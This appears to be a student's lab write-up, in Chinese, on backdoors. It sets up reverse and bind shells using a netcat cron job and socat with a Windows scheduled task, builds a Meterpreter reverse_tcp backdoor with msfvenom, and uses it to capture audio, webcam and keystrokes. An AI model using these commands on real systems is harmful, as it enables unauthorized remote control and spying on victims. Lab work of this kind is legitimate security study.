20155213實驗二 後門原理與實踐

20155213實驗二 後門原理與實踐

任務一：使用netcat獲取主機操做Shell，cron啓動

• 這裏須要理解一下cron啓動的知識
  • cron是一個linux下 的定時執行工具，能夠在無需人工干預的狀況下運行做業。如下是

    
    　　 service crond start //啓動服務

    
    　　 service crond stop //關閉服務

    
    　　 service crond restart //重啓服務

    
    　　 service crond reload //從新載入配置

    
    service crond status //查看服務狀態

  • 操做時通常使用crontab -e指令，此時，須要在用vim打開的文件末尾添加將要自啓動的相關指令下圖是添加語句遵照的規則
    
• 本實驗填寫進去的指令以下10 17 27 3 * /bin/netcat 192.168.1.102 5213 -e /bin/sh
  
  意思是在3月27號17時10分執行反彈鏈接到IP爲192.168.1.102的計算機上。
• 在3月27號17時10分以前，打開192.168.1.102機器監聽端口爲5213
  
  由圖能夠看出，在10分19秒得到了linux的shell。

任務二：使用socat獲取主機操做Shell, 任務計劃啓動

• 先了解一下socat的相關使用狀況
  • socat也是一款很不錯的網絡工具，能夠認爲是nc的增強版。做爲一款雙向數據流通道工具，它擁有許多強大的功能：端口的鏈接、端口偵聽、收發文件、傳遞shell、端口轉發、端口掃描等。這裏咱們只把socat做爲傳遞shell的工具使用；
  • 本實驗須要使用到的語句有這兩句：
    • 鏈接端口 socat - tcp:192.168.43.252:5213 #鏈接ip 爲 192.168.43.252 主機的80端口
    • 監聽端口 socat - tcp-l:5213 #偵聽本機的5213端口
    • 傳遞遠程shell socat tcp-l:5213 exec:<sh>,pty,stderr #當有主機鏈接本機的5213端口時，將會發送本機的shell給鏈接端
  • 使用win的任務計劃啓動開啓監聽
    • 在win10的小娜處直接敲任務計劃程序，出現以下界面:
      
    • 選擇建立任務，在常規選項卡中編輯名稱，並在觸發器選項卡中選擇按預約計劃，這樣到達預約時間，咱們的socat就會傳遞遠程shell:
      
    • 在操做選項卡中綁定socat程序，給出參數tcp-listen:5213 exec:cmd.exe,pty,stderr
      
    • 在Linux下輸入socat - tcp:192.168.43.252：5213
      

任務三：)使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

• 生成後門程序：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.161 LPORT=5213 -f exe > 20155213_backdoor.exe

• 在win下面使用ncat.exe -l 5213 > 20155213_backdoor.exe監聽並接受後門程序；
  

• 在Linux下輸入nc 192.168.43.252 5213 < 20155213_backdoor.exe向win傳輸後門程序。
  
• 在Linux下使用msfconsole指令，進入msf命令行，並設置LHOST和LPORT，並執行
  

• 在win下面運行後門程序，一會後能夠發現msf命令行已經成功得到cmd.exe.
  

任務四：使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

• 獲取主機音頻：
  
• 獲取主機攝像頭：
  
• 獲取擊鍵記錄：
  
• 嘗試提權，很惋惜失敗了
  

基礎問題回答

（1）例舉你能想到的一個後門進入到你係統中的可能方式？

答：後門通常隱藏在正常應用程序之中，甚至官方故意將後門設置在系統中。

（2）例舉你知道的後門如何啓動起來（win及linux）的方式？

答：能夠是綁定到某些程序上，達到自啓動

（3）Meterpreter有哪些給你映像深入的功能？

答：主要就是若是後門程序竟然能夠在未受權的狀況下，得到別人Shell！

（4）如何發現本身的系統有沒有被安裝後門？

答：查看進程和註冊表來發現系統的異常。